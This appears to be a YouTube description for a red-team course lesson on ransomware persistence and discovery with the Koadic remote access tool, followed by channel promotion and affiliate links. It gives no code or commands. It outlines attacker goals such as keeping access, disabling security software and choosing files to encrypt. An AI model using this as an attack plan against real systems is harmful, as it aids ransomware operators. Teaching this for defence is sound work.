Black Hat Ransom | Lesson Six | Deploying The RAT | Offensive Security

No real targets were attacked in this demonstration. I have created a safe environment using virtual machines. This demonstration is for educational purposes and for those interested in red teams and offensive security. The character Michael Connor is not real. This is a fictional person working for a fictional company, HackittIT, created for this course. Please take note YouTube!

Once a ransomware actor has compromised a machine, they will proceed to gain continued remote access. We call this phase persistence and the attacker will want to maintain a connection even when a disruption occurs (e.g. victim restarts the system).

Ransomware gangs are known to use remote access tools, otherwise known as remote access trojans. They have built in functionality to create persistence and provide a connection to a C2 server. Some gangs use security software such as Cobalt Strike.

Another important activity that a RAT allows is discovery. Ransomware gangs will scan through the target computer looking for software and file configurations.

The information that they can gather can assist them with making decisions on file changes, what utility programs to install to make configuration changes, what security/monitoring programs to disable, and which files to encrypt. This is all preparation for the deployment of ransomware and ensuring successful encryption.

In this video, I have used a remote access tool called Koadic to demonstrate persistence and discovery. Koadic is used by penetration testers and red teams for offensive security assessments. There have also been cases where ransomware gangs have used Koadic, although this is not common.

To watch my videos on an alternative platform you can visit the Odysee channel: https://odysee.com/@AvoidingBigBrother:8 This channel will include videos too risky for YouTube because of content moderation.

I have dropped the pitch of my voice for the videos and use the alias of Brian Bladen for privacy reasons. I am also paranoid of being hacked!

FREE TRAINING on our website at https://avoidbigbro.com/lp-courses/ and for blog posts https://avoidbigbro.com/news/

Join the Discord: https://avoidbigbro.com/the-discord-server/

My recommended products (so far) that I use as a lone wolf operator:

Malwarebytes Premium - Antimalware software suitable for personal use and not an option for business users. Affiliate link included - feel free to go to Malwarebytes in your browser if you don't want to include my link https://prf.hn/l/5NL4PJj

CyberGhost - I had no problems with this VPN and highly recommend. They are based in Romania where the laws on privacy are not so strict. Not truly anonymous but good for privacy. https://www.cyberghostvpn.com/en_US/

KeePass - Excellent offline password manager that I recommend rather than using a cloud service. https://keepass.info/

You can check out my ebooks at https://avoidbigbro.com/resources/

Available titles 'Covert Techniques' a guide about privacy and how to avoid surveillance. 'The Bear Roars' my research on Russian state-sponsored APT groups. Author Brian Bladen ... https://www.youtube.com/watch?v=iiHlX-7Y5Y0